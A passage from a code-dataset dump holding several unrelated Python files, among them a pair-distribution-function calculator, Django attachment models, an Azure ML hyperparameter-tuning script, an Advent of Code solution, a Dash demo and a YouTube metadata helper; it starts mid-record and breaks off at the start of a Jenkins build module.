not None:\n        search_q = q[q <= fit_at_q + (ds/2)*(2*np.pi)]\n    else:\n        search_q = q\n    fit_at_q, qpos = search_q.max(), search_q.argmax() 
# qmax = q_fix\n # end\n\n # qmax, qpos = q.max(), q.argmax() # qmax = q_fix\n fqfit = gq[qpos]\n iqfit = Iq[qpos]\n\n if N is None:\n a1 = np.sum(wi * gq * Iq)\n a2 = np.sum(wi * Iq * fqfit)\n a3 = np.sum(wi * gq * iqfit)\n a4 = np.sum(wi) * fqfit * iqfit\n a5 = np.sum(wi * gq ** 2)\n a6 = 2 * np.sum(wi * gq * fqfit)\n a7 = np.sum(wi) * fqfit * fqfit\n N = (a1 - a2 - a3 + a4) / (a5 - a6 + a7)\n\n C = iqfit - N * fqfit\n\n Autofit = N * gq + C\n\n SS = np.sum((Iq - Autofit) ** 2);\n\n r = np.arange(0.01, rmax + dr, dr) # rmax+dr to fit the eRDF\n\n phiq = ((Iq - Autofit) * s) / (N * fq_sq);\n phiq_damp = phiq * np.exp(-s2 * damping)\n\n Gr = 8 * np.pi * phiq_damp @ np.sin(q[:, None] * r) * ds\n\n return q, r, Iq, Autofit, phiq, phiq_damp, Gr, SS, fit_at_q, N\n\n\ndef calculate_relativistic(voltage):\n if voltage == '':\n voltage = 0.0\n voltage = float(voltage)\n c = 2.998e8\n relvelocity = c * (1 - 1 / (1 + voltage/511)**2 ) ** 0.5\n mass_e_relative = 1 / (1-(relvelocity**2/c**2)) ** 0.5\n return mass_e_relative\n\ndef rescaling_Iq(q_start_num, q_end_num, azavg, ds):\n x = np.arange(q_start_num, q_end_num + 1) # selected x ranges, end point = end point(eRDF) + 1\n Iq = azavg[q_start_num - 1:q_end_num]\n\n q = x * ds * 2 * np.pi\n return q, Iq\n\ndef pixel_to_q(args, ds):\n return np.array(args) * ds * 2 * np.pi\n\ndef q_to_pixel(args, ds):\n return np.round(np.array(args) / ds / 2 / np.pi).astype(int)\n\ndef _calculation_with_q(ds, q, Iq, element_nums, ratio, is_full_q, damping, rmax, dr, fit_at_q=None, N=None):\n element_nums = np.array(element_nums)\n for idx, element in enumerate(element_nums):\n if element == 0:\n ratio[idx] = 0\n element_nums = element_nums[element_nums != 0]\n ratio = np.array(ratio)\n ratio = ratio[ratio != 0]\n e_tot = np.sum(np.array(ratio))\n e_ratio = ratio / e_tot\n\n s = q / 2 / np.pi\n s2 = s ** 2\n L = np.uint16(len(q))\n paramK_elems = paramK[element_nums, :]\n f = np.array([KirklandFactors(s2, paramK_elem) for paramK_elem in paramK_elems])\n fq = np.sum(f * e_ratio[:, None], axis=0) # fq.shape = 2366,\n fq_sq = fq ** 2\n gq = np.sum(f ** 2 * e_ratio[:, None], axis=0)\n\n if is_full_q:\n AFrange = 0\n else:\n AFrange = int(2 / 3 * L)\n\n wi = np.ones((L, 1))\n wi[0:AFrange] = 0\n\n # added code\n if fit_at_q is not None:\n search_q = q[q <= fit_at_q + ds/2]\n else:\n search_q = q\n fit_at_q, qpos = search_q.max(), search_q.argmax() # qmax = q_fix\n # end\n\n # qmax, qpos = q.max(), q.argmax() # qmax = q_fix\n fqfit = gq[qpos]\n iqfit = Iq[qpos]\n\n if N is None:\n a1 = np.sum(wi * gq * Iq)\n a2 = np.sum(wi * Iq * fqfit)\n a3 = np.sum(wi * gq * iqfit)\n a4 = np.sum(wi) * fqfit * iqfit\n a5 = np.sum(wi * gq ** 2)\n a6 = 2 * np.sum(wi * gq * fqfit)\n a7 = np.sum(wi) * fqfit * fqfit\n N = (a1 - a2 - a3 + a4) / (a5 - a6 + a7)\n\n C = iqfit - N * fqfit\n\n Autofit = N * gq + C\n\n SS = np.sum((Iq - Autofit) ** 2);\n\n r = np.arange(0.01, rmax + dr, dr) # rmax+dr to fit the eRDF\n\n phiq = ((Iq - Autofit) * s) / (N * fq_sq);\n phiq_damp = phiq * np.exp(-s2 * damping)\n\n Gr = 8 * np.pi * phiq_damp @ np.sin(q[:, None] * r) * ds\n\n return q, r, Iq, Autofit, phiq, phiq_damp, Gr, SS, fit_at_q, N\n\ndef LobatoFactors(s2, paramL_element):\n A1, A2, A3, A4, A5, B1, B2, B3, B4, B5 = paramL_element\n f = (A1 * (s2 * B1 + 2))/((s2 * B1 + 1)**2) + (A2 * (s2 * B2 + 2))/((s2 * B2 + 1)**2) + \\\n (A3 * (s2 * B3 + 2))/((s2 * B3 + 1)**2) + (A4 * (s2 * B4 + 2))/((s2 * B4 + 1)**2) + \\\n (A5 * (s2 * B5 + 2))/((s2 * B5 + 1)**2)\n return np.array(f)\n\ndef KirklandFactors(s2, 
paramK_element):\n a1, b1, a2, b2, a3, b3, c1, d1, c2, d2, c3, d3 = paramK_element\n f = (a1 / (s2 + b1)) + (a2 / (s2 + b2)) + (a3 / (s2 + b3)) + (np.exp(-s2 * d1) * c1) + (np.exp(-s2 * d2) * c2) + (\n np.exp(-s2 * d3) * c3)\n # f1 = ((s2+b1_1).\\a1_1)+((s2+b2_1).\\a2_1)+((s2+b3_1).\\a3_1)+(exp(-s2.*d1_1).*c1_1)+(exp(-s2.*d2_1).*c2_1)+(exp(-s2.*d3_1).*c3_1);\n return np.array(f)","sub_path":"calculate/pdf_calculator.py","file_name":"pdf_calculator.py","file_ext":"py","file_size_in_byte":6498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"373570943","text":"##getting tree\r\n\r\nimport os\r\ndef get_tree(path):\r\n f=open(\"tree.txt\",'w+')\r\n data=os.popen(\"tree \"+path).read()\r\n print(data)\r\n f.write(data)\r\n f.close()\r\npath=input(\"path:\")\r\nget_tree(path)\r\nw=input(\"Press any key to continue\")\r\n","sub_path":"get_tree.py","file_name":"get_tree.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"314780044","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport uuid\nfrom datetime import timedelta\n\nfrom django.db import models\nfrom django.utils import timezone\nfrom django.core.files import File\nfrom django.core.urlresolvers import get_callable\nfrom django.utils.encoding import python_2_unicode_compatible\nfrom django.contrib.contenttypes.fields import GenericForeignKey, GenericRelation\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom positions.fields import PositionField\n\nfrom .conf import settings\nfrom .managers import AttachmentManager\n\n\ndef upload_path(instance, filename):\n FILENAME_FUNCTION = getattr(\n settings, 'FINEUPLOADER_FILENAME_FUNCTION', None)\n\n func = FILENAME_FUNCTION\n if func is None:\n func = lambda x: x\n\n if isinstance(func, str):\n func = get_callable(func)\n\n return os.path.join(\n 'attachments',\n instance.content_object._meta.app_label,\n instance.content_object._meta.object_name.lower(),\n str(instance.content_object.pk),\n func(filename),\n )\n\n\n@python_2_unicode_compatible\nclass Attachment(models.Model):\n\n content_type = models.ForeignKey('contenttypes.ContentType', on_delete=models.CASCADE)\n object_id = models.CharField(max_length=128)\n content_object = GenericForeignKey('content_type', 'object_id')\n\n field_name = models.CharField(max_length=256, null=True, blank=True)\n\n file_obj = models.FileField(_(\"file\"), upload_to=upload_path)\n original_filename = models.CharField(_(\"original filename\"), max_length=255, blank=True, null=True)\n\n # for internal use...\n\n owner = models.ForeignKey(\n getattr(settings, 'AUTH_USER_MODEL', 'auth.User'),\n related_name='owned_%(class)ss', on_delete=models.SET_NULL,\n null=True, blank=True, verbose_name=_('owner'),\n )\n\n uuid = models.UUIDField()\n\n position = PositionField(_(\"order\"), default=-1, collection=('object_id', 'content_type'))\n\n timestamp = models.DateTimeField(default=timezone.now)\n\n objects = AttachmentManager()\n\n class Meta:\n verbose_name = _('attachment')\n verbose_name_plural = _('attachments')\n unique_together = ['content_type', 'object_id', 'uuid']\n ordering = ['-timestamp', 'position']\n\n def __str__(self):\n if self.original_filename:\n return self.original_filename\n return str(self.file_obj.name)\n\n def get_absolute_url(self):\n return self.file_obj.url\n\n def as_file(self):\n class AttachmentFile(File):\n uuid = str(self.uuid)\n\n return AttachmentFile(self.file_obj, 
self.original_filename)\n\n def delete(self, *args, **kwargs):\n if self.file_obj and self.file_obj.storage.exists(self.file_obj.name):\n self.file_obj.delete()\n\n super(Attachment, self).delete(*args, **kwargs)\n\n\n@python_2_unicode_compatible\nclass Temporary(models.Model):\n\n formid = models.CharField(max_length=128)\n\n attachments = GenericRelation(Attachment)\n\n # for internal use...\n\n timestamp = models.DateTimeField(default=timezone.now)\n\n class Meta(object):\n verbose_name = _('temporary')\n verbose_name_plural = _('temporary')\n ordering = ['-timestamp']\n\n def __str__(self):\n return self.formid\n\n @property\n def is_expired(self):\n EXPIRY_AGE = settings.FINEUPLOADER_TEMPORARY_AGE\n\n if (self.timestamp + timedelta(seconds=EXPIRY_AGE)) <= timezone.localtime(timezone.now()):\n return True\n else:\n return False\n","sub_path":"fineuploader/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"162481612","text":"import os\nimport json\nimport azureml\nimport shutil\nfrom azureml.core import Workspace\nfrom azureml.core import Experiment\nfrom azureml.core.compute import ComputeTarget, AmlCompute\nfrom azureml.core.compute_target import ComputeTargetException\nfrom azureml.train.hyperdrive import RandomParameterSampling, BanditPolicy, HyperDriveConfig, PrimaryMetricGoal\nfrom azureml.train.hyperdrive import choice, loguniform, normal, uniform\nfrom azureml.train.estimator import Estimator\n\n# check core SDK version number\nprint(\"Azure ML SDK Version: \", azureml.core.VERSION)\n\n# initialize workspace from config.json\nws = Workspace.from_config()\n\nprint('Workspace name: ' + ws.name, \n 'Azure region: ' + ws.location, \n 'Subscription id: ' + ws.subscription_id, \n 'Resource group: ' + ws.resource_group, sep='\\n')\n\ndata_folder = '/home/wopauli/256_ObjectCategories_preproc'\n\n# # folder for scripts that need to be uploaded to Aml compute target\n# script_folder = './scripts'\n# os.makedirs(script_folder, exist_ok=True)\n \n# folder for scripts that need to be uploaded to Aml compute target\nscript_folder = './scripts/'\ntry:\n os.makedirs(script_folder)\nexcept BaseException as e:\n print(\"Deleting:\", script_folder)\n shutil.rmtree(script_folder)\n os.makedirs(script_folder)\n\n\n# create AML experiment\nexp = Experiment(workspace=ws, name='kd')\n\n# upload data to default datastore\nds = ws.get_default_datastore()\n# ds.upload(src_dir=data_folder, target_path='256_ObjectCategories_preproc', overwrite=True, show_progress=False)\n\n# choose a name for your cluster\ncluster_name = \"gpu-compute\"\n\ntry:\n compute_target = AmlCompute(workspace=ws, name=cluster_name)\n print('Found existing compute target')\nexcept ComputeTargetException:\n print('Creating a new compute target...')\n compute_config = AmlCompute.provisioning_configuration(vm_size='STANDARD_NC6', \n max_nodes=10)\n\n # create the cluster\n compute_target = ComputeTarget.create(ws, cluster_name, compute_config)\n\n # can poll for a minimum number of nodes and for a specific timeout. \n # if no min node count is provided it uses the scale settings for the cluster\n compute_target.wait_for_completion(show_output=True, min_node_count=None, timeout_in_minutes=20)\n\n# use get_status() to get a detailed status for the current cluster. 
\nprint(compute_target.get_status().serialize())\n\n\n# the training logic is in the keras_mnist.py file.\nshutil.copy('./squeezenet.py', script_folder)\nshutil.copy('./squeezenet_weights.hdf5', script_folder)\nshutil.copy('./kd_squeezenet.py', script_folder)\nshutil.copytree('./utils', os.path.join(script_folder, 'utils'))\n\nscript_params = {\n '--data-folder': ds.path('256_ObjectCategories_preproc').as_mount(),\n '--remote_execution': \"\"\n}\n\nest = Estimator(source_directory=script_folder,\n script_params=script_params,\n compute_target=compute_target,\n pip_packages=['keras==2.2.4', 'tensorflow==1.12.0', 'tensorflow-gpu==1.12.0', 'matplotlib', 'horovod', 'hickle', 'pillow==5.1.0', 'six==1.11.0', 'numpy==1.14.5'],\n entry_script='kd_squeezenet.py', \n use_gpu=True,\n node_count=1)\n\n\n\n\n# run = exp.submit(est)\n\n# print(run)\n\n# run.wait_for_completion(show_output=True)\n\nps = RandomParameterSampling(\n {\n '--learning_rate': uniform(1e-3, 2e-2),\n '--momentum': uniform(.1, .95),\n '--weight_decay': loguniform(-5, -3),\n '--temperature': uniform(1, 9),\n '--lambda_const': uniform(.1, .3),\n '--transfer_learning': choice(\"True\", \"False\")\n }\n)\n\npolicy = BanditPolicy(evaluation_interval=2, slack_factor=0.1, delay_evaluation=10)\n\nhdc = HyperDriveConfig(estimator=est, \n hyperparameter_sampling=ps, \n policy=policy, \n primary_metric_name='val_loss', \n primary_metric_goal=PrimaryMetricGoal.MINIMIZE, \n max_total_runs=100,\n max_concurrent_runs=5)\n\nhdr = exp.submit(config=hdc)\n\nhdr.wait_for_completion(show_output=True)\n\nbest_run = hdr.get_best_run_by_primary_metric()\nbest_run_metrics = best_run.get_metrics()\nprint(best_run)\n\n# Writing the run id to /aml_config/run_id.json for use by a DevOps pipeline.\nrun_id = {}\nrun_id['run_id'] = best_run.id\nrun_id['experiment_name'] = best_run.experiment.name\n\n# save run info \nos.makedirs('aml_config', exist_ok = True)\nwith open('aml_config/run_id.json', 'w') as outfile:\n json.dump(run_id, outfile)","sub_path":"kd_squeezenet_ht.py","file_name":"kd_squeezenet_ht.py","file_ext":"py","file_size_in_byte":4608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"615858770","text":"from collections import defaultdict\r\nimport heapq\r\nfile = open('day_10.txt', 'r')\r\ndata = file.read().splitlines()\r\n\r\nli = []\r\nheapq.heapify(li)\r\nlisti = [0]\r\ndiff = [0]*3\r\n\r\n#I could have just used sort but I am familiarising myself with DS hence i did both :)\r\nfor i in data:\r\n heapq.heappush(li, int(i))\r\n listi.append(int(i))\r\n\r\nprev_jolt = 0\r\nwhile len(li) != 0:\r\n small = heapq.heappop(li)\r\n if small - prev_jolt <= 3:\r\n diff[small - prev_jolt-1]+=1\r\n prev_jolt = small\r\n else:\r\n break\r\n\r\nprint((diff[2]+1)*diff[0]) #add 1 for the personal adapter voltage\r\n\r\npaths = defaultdict(int)\r\npaths[0] = 1\r\nlisti.sort()\r\nmax_volt = listi[len(listi)-1] + 3\r\nlisti.append(max_volt)\r\nfor adapter in listi:\r\n for diff in range(1, 4):\r\n next_adapter = adapter + diff\r\n if next_adapter in listi:\r\n paths[next_adapter] += paths[adapter]\r\n print(paths[next_adapter], next_adapter)\r\nprint(paths[max_volt])\r\n\r\n \r\n ","sub_path":"day_10.py","file_name":"day_10.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"161308134","text":"import youtube_dl\nimport time\nfrom youtube_dl.utils import DownloadError\nfrom core.crud.sql.datasource import (\n 
get_one_youtube_url_and_youtube_uploader_by_youtube_url,\n)\nfrom core import youtube_com_cookies_path\nimport json\nfrom numpy import random\nimport traceback\n\n\ndef get_raw_youtube_info(youtube_url: str):\n ytdl_options = {\n # \"cachedir\": False,\n \"quiet\": True,\n \"nocheckcertificate\": True,\n \"restrictfilenames\": True,\n \"cookiefile\": youtube_com_cookies_path,\n }\n\n ydl = youtube_dl.YoutubeDL(ytdl_options)\n\n result = ydl.extract_info(\n youtube_url, download=False # We just want to extract the info\n )\n joy = json.dumps(result)\n print(joy)\n return joy\n\n\ndef get_raw_title_uploader_from_youtube_url(youtube_url: str):\n ytdl_options = {\n # \"cachedir\": False,\n \"quiet\": True,\n \"nocheckcertificate\": True,\n \"restrictfilenames\": True,\n \"cookiefile\": youtube_com_cookies_path,\n }\n\n try:\n ydl = youtube_dl.YoutubeDL(ytdl_options)\n\n result = ydl.extract_info(\n youtube_url, download=False # We just want to extract the info\n )\n youtube_info_result = {\n \"youtube_url\": youtube_url,\n \"uploader\": result.get(\"uploader\"),\n \"youtube_title\": result.get(\"title\"),\n \"duration\": result.get(\"duration\") * 1000,\n }\n except DownloadError as ex:\n youtube_info_result = {\n \"youtube_url\": youtube_url,\n \"uploader\": f\"{ex}\",\n \"youtube_title\": f\"{ex}\",\n \"duration\": f\"0\",\n }\n except: # noqa\n youtube_info_result = {\n \"youtube_url\": youtube_url,\n \"uploader\": \"Error: Unknown error\",\n \"youtube_title\": \"Error: Unknown error\",\n \"duration\": \"0\",\n }\n x = random.uniform(0.5, 3)\n time.sleep(x)\n # print(youtube_info_result)\n return youtube_info_result\n\n\ndef get_youtube_title_and_youtube_uploader_from_youtube_url(youtube_url: str):\n db_datasources = get_one_youtube_url_and_youtube_uploader_by_youtube_url(\n youtube_url\n )\n\n if not db_datasources:\n youtube_info_result = get_raw_title_uploader_from_youtube_url(youtube_url)\n else:\n\n for db_datasource in db_datasources:\n info = db_datasource.info.get(\"source\", None)\n youtube_title = info.get(\"title\", None)\n uploader = info.get(\"uploader\", None)\n duration = db_datasource.duration_ms\n youtube_info_result = {\n \"youtube_url\": youtube_url,\n \"uploader\": uploader,\n \"youtube_title\": youtube_title,\n \"duration\": duration,\n }\n print(youtube_info_result)\n return youtube_info_result\n\n\nif __name__ == \"__main__\":\n start_time = time.time()\n youtube_urls = [\"https://www.youtube.com/watch?v=pOWuBM2RNmI\"]\n for youtube_url in youtube_urls:\n print(youtube_url)\n # get_youtube_title_and_youtube_uploader_from_youtube_url(youtube_url)\n test = get_youtube_title_and_youtube_uploader_from_youtube_url(youtube_url)\n print(test)\n t2 = time.time() - start_time\n print(t2)\n","sub_path":"youtube_dl_fuction/fuctions.py","file_name":"fuctions.py","file_ext":"py","file_size_in_byte":3230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"601870918","text":"from pylab import *\nfrom matplotlib.colors import LogNorm\n\nconfusion1 = loadtxt('../training_data/test_confusion_part2.1.txt')\nconfusion2 = loadtxt('../training_data/test_confusion_part2.2.txt')\nconfusion3 = loadtxt('../training_data/test_confusion_svm.txt')\n\nconfusion1 = confusion1/np.sum(confusion1)\nconfusion2 = confusion2/np.sum(confusion2)\nconfusion3 = confusion3/np.sum(confusion3)\n\nrcParams['font.family'] = 'serif'\nrcParams['font.sans-serif'] = ['times']\nrcParams['font.size'] = 7\nf = figure(figsize=(5.55, 
1.7))\nf.patch.set_facecolor('white')\n\nsubplot(131)\npcolor(confusion1.T, cmap='binary',\n norm=LogNorm(vmin=confusion1.min()+1e-3, vmax=confusion1.max()))\nxlabel('Prediction')\nylabel('Label')\ncolorbar()\nxticks(range(10))\nyticks(range(10))\ngca().annotate('(a)', xy=(0.016, 0.95),\n xycoords='figure fraction', fontsize='8')\n\nsubplot(132)\npcolor(confusion2.T, cmap='binary',\n norm=LogNorm(vmin=confusion1.min()+1e-3, vmax=confusion1.max()))\nxlabel('Prediction')\nylabel('Label')\ncolorbar()\nxticks(range(10))\nyticks(range(10))\ngca().annotate('(b)', xy=(0.34, 0.95),\n xycoords='figure fraction', fontsize='8')\n\nsubplot(133)\npcolor(confusion3.T, cmap='binary',\n norm=LogNorm(vmin=confusion1.min()+1e-3, vmax=confusion1.max()))\ncolorbar()\nxlabel('Prediction')\nylabel('Label')\nxticks(range(10))\nyticks(range(10))\ngca().annotate('(c)', xy=(0.67, 0.95),\n xycoords='figure fraction', fontsize='8')\n\ntight_layout()\nsavefig('Fig3.svg')","sub_path":"figures/plot_Fig3.py","file_name":"plot_Fig3.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"292583278","text":"# -*- coding: UTF-8 -*-\n\nimport json\n\nimport requests\nfrom django.core.management import BaseCommand, CommandError\nfrom django.conf import settings\n\nFORECAST_URL = settings.FORECAST_URL\nFORECAST_API_KEY = settings.FORECAST_API_KEY\n\nc = lambda k: round(k - 273.15, 1)\n\n\nclass Command(BaseCommand):\n\n def add_arguments(self, parser):\n parser.add_argument(\"city\", type=str)\n\n def handle(self, *args, **options):\n weather = requests.get(FORECAST_URL.format(\n options.get(\"city\"), FORECAST_API_KEY\n )).content\n data = json.loads(weather)\n if data[\"cod\"] == \"404\":\n raise CommandError(\"Unknown city\")\n temperature = data[\"main\"][\"temp\"]\n pressure = data[\"main\"][\"pressure\"]\n humidity = data[\"main\"][\"humidity\"]\n wind_speed = data[\"wind\"][\"speed\"]\n weather_desc = data[\"weather\"][0][\"description\"]\n self.stdout.write(\n self.style.SUCCESS(\n u\"{} / Температура : {} \"\n u\"/ Атмосферное давление : {} \"\n u\"/ Влажность : {} \"\n u\"/ Скорость ветра : {}\"\n ).format(\n weather_desc, c(temperature), pressure, humidity, wind_speed)\n )\n\n","sub_path":"attract_group/management/commands/get_weather.py","file_name":"get_weather.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"251822146","text":"# create_db.py\n\nfrom app import db\nfrom yaml import load, dump, CLoader as Loader, CDumper as Dumper\nfrom models import *\n\n# Create the database schema\ndb.create_all()\n\n# Add row if a match is not already present\ndef add_if_new(session, model, **kwargs):\n\tinstance = session.query(model).filter_by(**kwargs).first()\n\tif not instance:\n\t\tinstance = model(**kwargs)\n\t\tsession.add(instance)\n\t\tsession.commit()\n\n# Open the yaml file containing the default device types\nwith open('data_defaults.yaml') as file:\n\tdata_defaults = load(file, Loader=Loader)\n\n# Add device types to the database\nfor item in data_defaults['device_types']:\n\tadd_if_new(db.session, DeviceTypes, device_type=item)\n\n# Add connection methods to the database\nfor item in data_defaults['connect_methods']:\n\tadd_if_new(db.session, ConnectMethods, 
connect_method=item)\n","sub_path":"web/create_db.py","file_name":"create_db.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"273756658","text":"\"\"\"\nThis module contains the Creature class.\n\nA creature has a score. A score at zero or below indicates\nthe creature is \"dead\".\n\nThe creature needs to know:\n* its score\n* its facing (N, E, S, W)\n* its grid size (width of world, height of world)\n* its start location (x, y) if you prefer\n* its start facing (N, E, S, W)\n* its current location (x, y)\n\"\"\"\n\n\nclass Creature:\n \n def __init__(self, init_score, world_size, start_location, init_facing='N'):\n \"\"\"\n Initialize a creature.\n \n Args:\n self: This object\n init_score: A number that gives the creature an initial score.\n A creature is only \"alive\" if it has a score greater than zero.\n world_size: A tuple or list that gives the creature information about the size \n of the world.\n The first entry in the pair should refer to the horizontal (x) dimension \n of the world.\n The second entry in the pair should refer to the vertical (y) dimension \n of the world.\n NOTE: The world's \"origin\" (0,0) coordinate is in the upper-left corner.\n start_location: A tuple or list that gives the creature an initial location within \n the world.\n Its value for each pair of coordinates should be 0 <= position < world_dim,\n where position and world dim refer to either the horizontal (x) or vertical (y)\n dimension of the world.\n init_facing: An initial facing.\n Facing is one of four values: N, E, S, W representing one of the four cardinal\n direction: (N)orth, (S)outh, (E)ast, or (W)est. Here, North points upward on \n the display; South downward; West to the left; and East to the right.\n \"\"\"\n self.score = init_score # Creatures are online \"alive\" if their score is > 0\n self.world_size = world_size # How big is our world (width, height)\n self.current_location = start_location # (x,y) position of creature\n self.facing = init_facing # N,E,S,W direction the creature is facing\n self.initial = [init_score, start_location, init_facing] # Backup for resetting\n \n def reset(self):\n \"\"\"\n Resets the creature to initial conditions.\n \n Args:\n self: This object\n \n Returns:\n None, but the creature is updated to initial conditons\n \"\"\"\n self.score = self.initial[0]\n self.current_location = self.initial[1]\n self.facing = self.initial[2]\n\n \n def is_alive(self):\n \"\"\"\n Checks to see if the creature is alive. A creature is only alive if its score \n is greater than zero.\n \n Args:\n self: This object\n \n Returns:\n a Boolean value True or False if the creature is alive.\n \"\"\"\n if self.score > 0:\n return True\n else:\n return False\n \n \n def kill(self):\n \"\"\"\n Kill the creature.\n \n Args:\n self: This object\n \n Returns:\n None, but will set the creature's score to 0 to kill it.\n \"\"\"\n self.score = 0\n \n \n \n def rotate_left(self):\n \"\"\"\n Rotates the creature's facing 90 degrees to the left. 
\n If a creature is facing north and it rotates\n 90 degrees to the left four times, the sequence of facings \n would be: N -> W -> S -> E -> N\n \n Args:\n self: This object\n \n Returns:\n None, but the creature is rotated.\n \"\"\"\n if self.facing == \"N\":\n self.facing = \"W\"\n elif self.facing == \"W\":\n self.facing = \"S\"\n elif self.facing == \"S\":\n self.facing = \"E\"\n elif self.facing == \"E\":\n self.facing = \"N\"\n else:\n raise Exception('Unknown direction present')\n \n \n def rotate_right(self):\n \"\"\"\n Rotates the creature's facing 90 degrees to the right. If a creature is \n facing north and it rotates 90 degrees to the right four times, \n the sequence of facings would be: N -> E -> S -> W -> N\n \n Args:\n self: This object\n \n Returns:\n None, but the creature is rotated.\n \"\"\"\n if self.facing == \"N\":\n self.facing = \"E\"\n elif self.facing == \"E\":\n self.facing = \"S\"\n elif self.facing == \"S\":\n self.facing = \"W\"\n elif self.facing == \"W\":\n self.facing = \"N\"\n else:\n raise Exception('Unknown direction present')\n \n \n \n def move_forward(self):\n \"\"\"\n Changes the creature's current_location to move one unit in the direction \n the creature is facing. So, if a creature is facing North, it will move one \n unit *up*. Since the origin (0,0) cell of the world is in the upper-left corner, \n this would mean the creature's location in the y-dimension is decreased by one unit.\n \n NOTES:\n * The origin is in the upper-left corner. That means movement up and left \n decreases the value of the location coordinates; moving down or right \n increases them.\n \n * The world is finite sized. This means the creature *CANNOT* have a negative \n coordinate or a value greater-than or equal-to the world_size for any particular \n dimension. For example, if the world size is (5,5), the creature can never have \n a current_location (5,2) or (2,5) because those would both be outside the \n dimensions of the world. (The highest value in any dimension in a 5x5 world \n would be 4.)\n \n * If a creature cannot move (e.g. it's at the edge of the world), then the creature \n will stay where it is presently located.\n \n * YOU WILL HAVE TO ENSURE THAT THE CREATURE DOES NOT MOVE INTO AN INVALID \n COORDINATE AS DESCRIBED ABOVE. The game will kill it otherwise. 
Or crash.\n \n Args:\n self: This object\n \n Returns:\n None, but the creature tries to move.\n \"\"\"\n loc = list(self.current_location)\n world = list(self.world_size)\n if self.facing == \"N\" and loc[1] > 0:\n loc[1] = loc[1] - 1\n elif self.facing == \"E\" and loc[0] < world[0] - 1:\n loc[0] = loc[0] + 1\n elif self.facing == \"W\" and loc[0] > 0:\n loc[0] = loc[0] - 1\n elif self.facing == \"S\" and loc[1] < world[1] - 1:\n loc[1] = loc[1] + 1\n else:\n self.score = 0\n \n self.current_location = tuple(loc)\n","sub_path":"exercises/04/PointyGame/creature.py","file_name":"creature.py","file_ext":"py","file_size_in_byte":7066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"526418417","text":"\"\"\"\nTakes a .yml file with structure as follows:\n\n script: path/to/script/name.py\n config: path/to/yml/config.yml\n run_in: 'host' or 'container'\n num_gpus: how many gpus (default: 0)\n blocking: whether to block on this job or not (default: false)\n\nCould also be multiple jobs:\n parallelize: whether to parallelize each job (default: false)\n num_jobs: how many jobs to run in parallel (default: 1)\n\n jobs:\n - script: script1.py\n config: config1.yml\n - script: script2.py\n config: config2.yml\n ...\n\nThe jobs get executed one after the other.\n\"\"\"\nimport sys\nsys.path.insert(0, '.')\n\nfrom runners.utils import build_parser_for_yml_script, parse_yaml\nfrom runners.script_runner_pool import ScriptRunnerPool\nfrom cookiecutter_repo import logging\nfrom multiprocessing import cpu_count\n\ndef main(path_to_yml_file):\n spec = parse_yaml(path_to_yml_file)\n\n num_jobs = min(cpu_count(), spec.pop('num_jobs', 1))\n\n logging.info(\n f\"\\n Executing scripts with num_jobs: {num_jobs}\"\n )\n\n pool = ScriptRunnerPool(max_workers=num_jobs)\n pool.submit(spec['jobs'])\n\nif __name__ == \"__main__\":\n parser = build_parser_for_yml_script()\n args = vars(parser.parse_args())\n main(args['spec'])","sub_path":"{{cookiecutter.repo_name}}/scripts/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"243843842","text":"# -*- coding: utf-8 -*-\n#Dash imports\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\n\n#External css style sheet\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\n\n#Main app\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\n\n#App layout, it describes what the applications looks like\napp.layout = html.Div([\n dcc.Input(id='my-id', value='initial value', type='text'),\n html.Div(id='my-div')\n])\n\n#Callbacks for interactivity\n@app.callback(\n Output('my-div', 'children'),\n [Input('my-id', 'value')]\n)\ndef update_output_div(input_value):\n return 'You\\'ve entered \"{}\"'.format(input_value)\n\n#App server\nif __name__ == '__main__':\n app.run_server(debug=True)","sub_path":"Callbacks snippets/Input Text.py","file_name":"Input Text.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"189742986","text":"\"\"\"\nA Jenkins build represents a single execution of a Jenkins Job.\n\nBuilds can be thought of as the second level of the Jenkins hierarchy\nbeneath Jobs. Builds can have state, such as whether they are running or\nnot. 
